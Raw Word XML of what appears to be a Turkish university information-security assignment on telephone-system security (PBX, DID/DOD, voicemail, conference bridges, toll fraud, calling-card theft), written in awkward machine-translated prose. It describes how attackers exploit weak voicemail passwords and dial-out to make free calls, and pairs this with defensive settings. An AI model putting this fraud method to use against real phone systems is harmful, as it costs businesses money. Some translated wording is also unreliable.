          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Her iki uç (istasyon veya cihaz).</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8855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Analog ve Dijital</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008855BB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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em gövde hem de hat analog veya dijital sinyalleri taşıyabilir. Yani sadece bir tane taşıyabilirl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seferde yazın. Kavramsal olarak, başlangıç noktasından varış noktasına olan bağlantıya devre adı verilir ve iki</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>ana devre tipleri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pP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log devreler, sese dönüştürüldükten sonra ses trafiğini ve dijital sinyalleri taşımak için kullanılır. Analog iken</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geleneksel olarak ses devreleriyle ilişkilendirilir, birçok sesli çağrı dijital ekipman aracılığıyla yapılır ve işlen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cak, analog / dijital dönüşüm süreci yoğun bir teknik tartışmadır ve burada açıklanmamışt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analog devre bilgi iletmek için genlik (hacim) ve frekanstaki değişiklikleri kullan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arayandan diğerine. Devrenin mevcut bant genişliği 64 K'dır, ancak 8K kullanıl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ant genişliği ahize ve anahtar arasında sinyal vermek için kullanılır, gerçek ses veya veri için 56K bırakıl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sinyall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 bilgisayar modemi telefon hattına bağlamayı düşünün. Modemin maksimum kullanılabilir hızı</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e çalışabilir 56K. 56K modem için gerekçe şimdi açık olmalıdır. Ancak çoğu insan biliyo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evre kalitesi, hat gürültüsü ve mesafe arasındaki uzaklık nedeniyle modem bağlantısı nadiren 56K’da yapıl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 taşıyıcısının anahtarına abone. Modemler daha sonra tekrar bölümde tartışılmakta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log çizgiler görüşme için gerçek ses sinyallerini taşıdığı için kolayca ele geçirilebilirler. Kimse</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evinde birden fazla telefon olması, gizli dinleme ile ilgili bir problem yaşamıştır. Kim</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elefon devresine erişebilir konuşmayı dinleyebilirsiniz. Bir telefon musluğu gerçekten gerekli değildir - sadece bilg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eklenecek teller ve telefon ahizesi.</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ununla birlikte, gizli dinlemeyle ilgili soruna rağmen, birçok insan da kendileriyle ilgilenmez</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isi telefon görüşmelerini dinliyor ol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logın alternatifi dijitaldir. Analog hat bilgi iletmek için ses kullanırken, dijital</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evre verileri temsil etmek için dijital sinyaller kullanır. Sonuç olarak, dijital devre teknolojileri taşıma kapasitesine sahipt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ant genişliği devre üzerinde arttıkça hızları önemli ölçüde arta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ijital devreler birçok avantaj sunar. Daha fazla miktarda veri trafiği ve daha fazlasını taşıyabilirle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Analog bir devreden daha fazla eşzamanlı telefon görüşmesi. İzinsiz dinlemelere karşı daha iyi koruma sağlarlar ve</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tasarımları nedeniyle telefon dinleme. Ancak, dijital sinyale rağmen, aynı paylaşan herhangi bir telefon istasyonu</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evre hala konuşmadan konuşmayı zorlanmadan gizleye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Devreler, güvenlik sorunlarının başlıca nedeni değildir. Aksine, çoğu işletme için endişe ve</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bireyler bu devrelerin yetkisiz ve uygunsuz kullanımından kaynaklanmaktadı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atlar ve gövdeler, istenen seviyeyi sağlamak için birçok farklı şekilde ve yapılandırmada kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008855BB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>hizmet. Tipik olarak, bir istasyona bağlı hat hem gelen hem de giden aramaları sunar. Ancak, bu yapar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>her durumda böyle olması gerekmez.</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Doğrudan içeri arama (DID)</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lastRenderedPageBreak/>
        <w:t>Dışarıdaki bir arayan kişi, işletmedeki partisine ulaşmadan önce bir operatöre bağlan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genellikle anahtar şalter PBX olarak adlandırılır. Bununla birlikte, birçok PBX sistemi, her birinin olduğu yerde doğrudan içe doğru arama veya DID sun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istasyonuna harici arayanı doğrudan alıcıya bağlayan bir telefon numarası atan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oğrudan içeriye doğru arama, herhangi bir operatör dahil olmadığından amaçlanan alıcıya ulaşmayı kolaylaştırır. Anc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ID'nin dezavantajları da vardır. DID servislerine bağlı modemlere yetkili ve yetkisiz kişilerce ulaşıla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enzer insanlar. Ayrıca, bireylerin işgücünden bilgi almadan bilgi almalarını ve talep etmelerini kolaylaştırır.</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merkezi bir operatör veya görevli tarafından taranması.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00107EB7"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 xml:space="preserve">Doğrudan Dış </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Arama</w:t>
      </w:r>
      <w:r w:rsidRPr="00107EB7">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DOD)</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oğrudan dışa doğru arama tam olarak DID'nin tam tersidir. Bazı PBX kurulumlarında kullanıcının serbest bir hat seçmesi gerek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unda veya bir dış arama yapmak için bir operatöre erişin. DOD ile, arayan kişi telefonu açar, ar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9 rakamı gibi bir erişim kodu ve ardından harici telefon numarası. Çağrı telefona yönlendir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aşıyıcı ve alıcı kişiye bağl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operatörü, abonelerine hizmet vermek için burada açıklanan bileşenleri birleştirir.</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operatörleri daha sonra kamusal anahtarlamalı telefonu sağlamak için sistemlerini ağ geçitl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>eri üzerinden birbirine bağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00107EB7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107EB7">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Özel Alan Şubesi Değişimi (PABX)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00107EB7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>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Özel alan şube değişimi veya PABX, genel olarak PBX olarak da adlandırılır. Sonuç olarak, olac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rbirinin yerine kullanılan terimleri görün. PBX, bir işletme için etkili bir telefon anahtarıdır; ve, gibi</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urumsal, farklı boyutlarda geliyor. PBX, hat kartı, çağrı işlemcisi ve bazı temel yönlendirmeler sağl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mel fark, PBX’in telefon operatörünün şebekesine nasıl bağlandığıdır. PBX'i karşılaştırırs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nternete bağlanan bir veri ağındaki bir yönlendiriciye, her iki cihaz da bilgi göndermek için yalnızca bir yol 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veya şebekenin dışındaki noktalara yapılan telefon görüşmeleri (bkz. Ek 51.3).</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PBX'in telefon taşıyıcısı düğmesi gibi kendisine bağlı birçok telefon istasyonu vardır. PBX biliyo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ağrıları doğrudan aynı PBX’e bağlı olan istasyonlara yönlendirmek için. Harici telefon numarası aramas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aşıyıcının anahtarına yönlendirilir; bu durumda aramayı işler ve alıcı istasyona yönlendir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taşıyıcısının belirli endişeleri olmasına rağmen, her iki cihazın da benzer güvenlik sorunları var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letişim ağı kritik bir altyapı unsuru olarak kabul edilmektedir v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hizmet verememek. İşletme nadiren bu sorunlarla baş etmek zorunda kalır; ancak, başarısız olan girişim</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PBX'in zarar görmesini önlemek için yeterli kontrolün sağlanması, ayrıca belirli yükümlülüklerle de karşı karşıya kalabili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Sesli mesaj</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sekreter bugün iletişim ile her yerde. Bununla birlikte, sesli posta genellikl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sistemi ve saldırgan için ücretsiz telefon görüşmeleri - ve sistem sahibi için ücretsiz dolandırıcılı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sekreter, telefonlarına cevap veremeyen kullanıcıların telefon mesajlarını kaydetmek için kullanıl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ullanıcılar mesajlara, genellikle telefon dahili numaraları olan bir tanımlayıcı girere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parol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Sesli posta sorunları genellikle şifre yönetimi etrafında döner. Çünkü sesli mesajla çalışmak zorund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Şifre, şifre yalnızca basamak içerebilir. Bu, şifreye saldırmanın, şifreden oldukça önemsiz olduğu anlamına ge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saldırganın bakış açısı. Sonuç olarak, geleneksel şifre ve hesap yönetimi sorunları burada olduğu gibi bulunmakta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iğer sisteml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Hesap adıyla aynı şifreleri</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Parola karmaşıklığı kuralları yo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Parola yaşlanma veya son kullanma tarihi yoktu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Hesap kilitlemesi yo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Diğer sesli posta yapılandırma sorunlar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Yaygın bir yapılandırma sorunu çevirmedir. Çevirmeli bağlantı ile, sistem telefonu kabul ed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numarayı ve aramayı yapar. Bu özellik yalnızca dahili veya yerel numaralara izin vermek veya devre dışı bırakmak üzere kısıtlana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lastRenderedPageBreak/>
        <w:t>o. Çevirmeye izin veriliyorsa ve uygun şekilde yapılandırılmamışsa, işletme şimdi uzun süreli veya diğer ücretli aramalar için faturaları öd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Saldırganlar erişim kazanmak için eski posta kutularını (bir süre sonra erişilmemiş) kullanırl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posta kutusuna. Posta kutusu şifresi alınırsa ve sesli posta sistemi, yeniden aramaya izin verecek şekilde yapılandırılmışsa, saldırganlar şimdi ücretsiz aramalar yapıyor. Saldırgan önce posta kutusundaki selamlamayı b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asit “evet”. Şimdi, “evet” kelimesini bekleyen otomatik bir sistem aracılığıyla yapılan herhangi bir arama çağrıs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otomatik olarak kabul edildi. İşletme, aramanın ücretini öd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Saldırgan, hesap tanımlayıcısına, tipik olarak posta kutusunun telefon uzantısına ve şifreye gir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sekreter tarafından kimliği doğrulandıktan sonra, saldırgan uygun kodu ve telefon numarasını gir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harici arama için. Kullanılabilir basamaklarda herhangi bir kısıtlama yoksa, saldırgan herhangi bir telefonu araya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ünyanın herhangi bir yerinde say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urada gösterilen senaryo çoğu sisteme uygulanabilir basit teknikler kullanılarak önlene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Yönetici ve görevli şifreleri değiştiri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Dahili numarayı ilk şifre olarak kullanmayı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Doğrudan aramayı devre dışı bır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Telesekreteri, şifre için en az altı hane kullanacak şekilde yapılandırı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Varsa, şifre geçmişi seçeneklerini etkinleştiri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Varsa şifre son kullanım tarihini etkinleştiri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Eski posta kutularını kaldırı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üzgün yapılandırılmış sesli posta, veri ağı ve ses gibi kurum için güçlü bir araçtır</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Sesli Konferans</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rçok işletme düzenli olarak iş yapmak için konferans görüşmeleri kullanır. Mevcut ekonomik ortamda, birço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şletmeler, konferans görüşmelerini farklı konumlardaki toplantılar için seyahat etmenin uygun maliyetli alternatifi olarak kullanıyo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görüşmesi, aramaları kabul eden ve arayanın hangi konferansı olduğunu belirleyen bir “köprü” kullan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elefon numarası ve konferans araması şifresine göre yönlendir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görüşmesi köprüsünde bulunan güvenlik seçenekleri teknolojiye bağlıdır. Ne olursa olsun, konferans görüşmesine katılanlara, kurumsal duyarlı bilgileri tartışmamaları gerektiği hatırlatıl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görüşme bilgisini edinen veya tahmin eden kişi aramaya katılabilir. Sonuç olarak, konferans aramas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atılımcı bilgileri, katılımı sınırlandırmak için korun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köprüleri, çeşitli teknolojileri kullanarak tek seferlik, tekrarlayan ve geçici aramalar için kullanılır. Baz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araması satıcıları, kuruluştaki herkesin isteğe bağlı konferans yapmasına izin veren hizmetler sağl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öprü. Bu konferans köprüleri, konferans görüşmesini başlatmak için hazır olması gereken bir “ev sahibi” veya başkan kullan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aşkanın, çağrıyı başlatmak için kullanılan ikinci bir şifresi vardır. Ev sahibi veya başkanı öğrenen herhangi bir kullanıc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du köprüyü istediğiniz zaman kullanabilirsiniz.</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köprüleri ile ilgili güvenlik sorunlar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Başkan kodunun kayb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Köprünün izinsiz kullanım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Köprüye uygunsuz erişim</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Köprüdeki hassas bilgilerin kayb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u sorunların tümü, doğru kullanıcı bilinci ile ele alınmaktadır - ki bu çok az sayıda işletme için şansl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slında, kendi konferans köprülerini işletmek yerine, telefonun</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konfigürasyonları.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00107EB7"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Mümkünse, konferans köprüsü aşağıdaki ayarlar ve yeteneklerle yapılandırılmalıdır:</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Konferans görüşmesi, başkan hazır olana kadar başlayamaz.</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Başkan köprüden ayrıldığında tüm katılımcıların bağlantısı kesilmelid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Başkan, köprüye girmek için ikinci bir güvenlik erişim kodu belirleme seçeneğine sahip ol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Başkan, köprüyü değiştirmek içi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lastRenderedPageBreak/>
        <w:t>Arayanı susturma, susturma veya susturma, köprüleri kilitleme ve konferansa erişm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Şebek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aşkanın komutları konferans aramasının güvenliği için önemlidir. Tüm katılımcılar bir kez</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atılan, başkan herkesin orada olduğunu doğrulamalı ve köprüyü kilitlemelidir. Bu kimseyi önler</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Konferans görüşmesine katılmak için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>.</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Güvenlik sorunları</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ölüm boyunca, teknolojiler ve güvenlik konularını tartıştık. Ancak, özel ne olursa olsu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şletmenizin kullandığı telefon sisteminin yapılandırması, yapmanız gereken bazı güvenlik endişeleri v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lgili olm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Geçiş Ücreti Dolandırıcılığ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Geçiş ücreti sahtekarlığı, işletmeler, bireyler ve telefon operatörleri için büyük bir endişe kaynağıdır. Geçiş ücreti sahtekarlığı gerçekleştiğind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ücretli veya ücretli telefon görüşmeleri sahtekarlıkla yapılır. Dahil olmak üzere çeşitli dolandırıcılık yöntemleri var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yetkili kullanıcılar tarafından uygunsuz kullanım, hizmetlerin çalınması, telefon kartları ve kurumun iletişim sistemine doğrudan dahili aram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1998 Tüketici Haberleri raporuna göre, yılda yaklaşık 4 milyar dolarlık bir dolandırıcılıktan mahrum olmak için kaybedilmektedir. Rapo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URL adresinde çevrimiçi olarak erişilebilir: http://www.fcc. gov / Büroları / Common_Carrier / Bültenlerimizde / ttf &amp; you.pdf.</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olandırıcılık maliyeti sonuçta daha yüksek iletişim maliyetleri ile işletmelere ve tüketicilere aktarılır. Bazı durumlarda, telefon operatörü aboneyi masraflardan sorumlu tut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yıkıcı ol. Sonuç olarak, işletmeler telefon operatörlerine ödeme yapan yolsuzluk sigortası için ödeme yapabilirl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Ses Güvenliği işletme indirildikten sonra öder. Ücretli dolandırıcılık sigortası cazip gelse de, pahalı v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ndirimler genellikle çok yüksekt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uruluşunuzdaki geçiş yolsuzluğunu tespit etmek imkansız değildir. Küçük bir şirketiniz vars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asitçe çeşitli insanlar için telefon kullanımının izlenmesi, çağrı modellerini tanımlamaya yeterli ol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aha büyük kuruluşlar için, analiz için PBX'ten bilgi almak gerekebilir. İçin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107EB7">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Örneğin, her telefon görüşmesinden arama kayıtlarını kaydedebiliyorsanız, bir ücretlendirme yapmak mümkündü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Yetkili Erişimin Uygunsuz Kullanımı</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r işletmedeki her çalışanın genellikle masada bir telefonu vardır veya şirket tarafından sağlanan bir telefona erişimi var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oğu çalışan, masalarından uzun mesafeli gişe aramaları yapma olanağına sahiptir. Çalışanların çoğu yapm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şlerinin bir parçası olarak günlük olarak yapılan uzun mesafeli aramalar, çoğu kişinin uzun vadeli aramalar yapmasını pahasına yapmak için iki kez düşünmez.</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u tür bir kullanımın izlenmesi ve önlenmesi işletme için zordur. Sık sık çağrı kalıplar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numara analizi denir ve çalışanlara aylık telekomünikasyon maliyetlerini bildirmenin birkaç yolu var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u problemle mücadele. Ayrıca, kurumsal telefon hizmetlerinin kullanımına ilişkin kurumsal politikalar v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İşletmenizde zaten yoksa, uygunsuz kullanım için cezalar verilmelidir. En sonund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rçok kuruluş, uzun mesafeli telefon görüşmeleri yapmak için faturalandırma veya yetkilendirme kodları kullan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ullanımı ve masrafları belirli departmanlara veya müşterilere faturalandırmak.</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ncak, kuruluşunuz bir özellik olarak koşullu ücretli reddetme (CTD) özellikli bir PBX'e sahipse,</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unu, şehirlerarası veya ücretli aramalara izin verilmeyen telefon istasyonlarında etkinleştirmeyi düşünerek. Örneği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Kullanıcılar belirli telefon numaralarını veya alan kodlarını arayamamalı. Alternatif olarak, bir telefon istasyonu</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tamamen ücretli arama ayrıcalıklarını reddetti.</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ncak, Avrupa'da, CTD uygulamak daha zordur, çünkü pek çok kişiyi aramak nadir değild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ir günde farklı ülkeler. Sonuç olarak, CTD parametrelerinin yönetimi çok zorlaş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CTD, daha önce bölümde tartışıldığı gibi bir NCOS tanımında özel bir seçenek olarak yapılandırıla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rama kartları</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ağrı kartları en yaygın yolsuzluk dolandırıcılık şeklidir. Arama kartı numaraları günlük olarak çalınır ve satıl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ünya çapında temeli. Çağrı kartı hırsızlığı, genellikle bir kişi aboneyi gözlemlediğinde gerçekleş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lastRenderedPageBreak/>
        <w:t>numarayı kamuya açık bir telefona girme. Kart numarası daha sonra hırsız tarafından kaydedilir ve satışa sunulu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iğer aramala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ağrı kartı hırsızlığı, takip için genellikle dolandırıcılık birimleri olan telefon operatörleri için büyük bir problemd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hırsızlık ve arama yazılımı, arama düzenlerini izler ve dolandırıcılık araştırmacılarını olağandışı uyar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ağıran desenle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Bazı durumlarda, oteller arama kart numarasını, konuklarına verilen faturalara yazdırabil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eşitli insanlara uygun rakamlar. Ek olarak, PBX doğru yapılandırılmamışsa, arama kartı bilgileri telefon ekranında gösterilir; böylece yakındaki herkesin rakamları görmesini kolaylaştırır ve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107EB7">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Numarayı kullan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00107EB7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pP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Diğer PBX tabanlı problemler, son numarayı tekrar arama işlemini içerir. PBX son numarayı tekrar aramayı destekliyorsa, herhangi bir çalışan</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ranan son numarayı hatırlayabilir ve erişim ve arama kartı numaralarını alabilirsiniz.</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Çalışanlar, çağrı kartlarının yasal olmayan kullanımıyla ilgili sorunların ve maliyetlerin farkında olmalıdı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Arama kartı kullanırken uygun koruma şunları içerir:</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Numarayı girerken elinizle koruma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00107EB7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107EB7">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>• Numarayı ezberlemek, aramayı yaparken görünür bir kartın olmaması için</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008855BB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107EB7">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>• Şirketinizin PBX'in rakamlarını kaydetmediğinden emin olun.</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pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34941338" wp14:editId="2FB212C0">
            <wp:extent cx="1104900" cy="1044769"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="4127" name="Resim 4127" descr="C:\Users\emreaydi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reaydin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\imag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1044769"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>T.C.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ATATÜRK ÜNİVERSİTESİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Mühendislik Fakültesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Bilgisayar Mühendisliği</w:t>
      </w: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rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>DERSİN ADI</w:t>
      </w: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 xml:space="preserve">   BMS-302 Bilgisayar-Bilgi Güvenliği ve Yönetimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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ÖDEV KONUSU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
